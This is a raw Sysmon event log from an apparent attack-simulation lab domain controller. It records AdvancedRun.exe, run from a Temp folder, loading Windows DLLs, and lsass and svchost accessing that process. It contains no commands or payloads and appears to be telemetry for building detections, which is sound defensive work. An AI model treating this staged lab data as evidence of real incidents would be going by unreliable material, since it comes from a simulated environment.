18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004008459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:06.099{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007808Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004007805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004007804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:06.036{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004007803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004007802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:06.021{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004007801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004007796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating 
SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007789Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007788Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007787Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004007786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 
(rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004007779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007773Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004007769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 